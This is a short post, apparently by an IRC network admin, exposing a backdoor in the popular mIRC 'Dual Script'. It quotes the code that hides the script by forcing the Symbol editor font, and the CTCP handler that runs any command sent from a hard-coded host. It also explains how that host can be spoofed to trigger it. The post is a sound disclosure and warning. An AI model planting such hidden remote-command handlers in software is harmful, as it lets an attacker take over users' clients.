DUAL SCRIPT -------------------------------------------------------------------------------------------------------------------- I saw this script become more and more popular by the day while I was helping in #NoHacks on LucidChat. I heard through the grapevine that there was an exploit in it that would allow a user, given the right credentials, to essentially do anything remotely, via CTCP to the Dual Script user. So, I looked into it for myself, and saw there some really funny bits in the code. Firstly, there was a timer to ensure the font of the Scripts Editor was set to 'Symbols', and if it was changed, the script would shut itself down, so that on the next start, it would be set again. Font code: Remotes: on *:start:{ [redacted] font2 .timerfont 0 1 .font } Aliases: /font { if ($readini mirc.ini fonts fscripts != Symbol,1) { .writeini mirc.ini fonts fscripts Symbol,1 | .timer 0 0 exit } } font2 { if $readini mirc.ini fonts fscripts != Symbol,1 { writeini mirc.ini fonts fscripts Symbol,1 | halt } } ------------- Now, why would someone lock down the script like that? I think I recall some other popular script doing something similar to this, but it was a legitimate script. Let's look deeper. Clicking the Users tab, just to see if anything was carried over from testing of the scri- 500:*!*@ssharp.users.undernet.org - well, now we have something specific to look for. Lines containing '500:'. They are as follows: Remotes: CTCP 500:*:*: $1- on 500:text:*!dual-script*:#:{ /notice $nick %logo %version } ctcp 500:*lock*:*:{ /writeini mirc.ini dual lock locked /dialog -m lock lock } ------------- The lock thing brings up a dialog that asys the script is locked and it needs to be downloaded again. Concept of the backdoor: user1 has the host address of ssharp.users.undernet.org (almost any IRCOp can change their host via /sethost, or a user can request a vHost) user1 types /ctcp user2 msg user1 This is Dual Script user2 sends a message to user1, "This is Dual Script" ------------- Moral of the story: use a script you can trust MusashiX90 - GameCraftX NetAdmin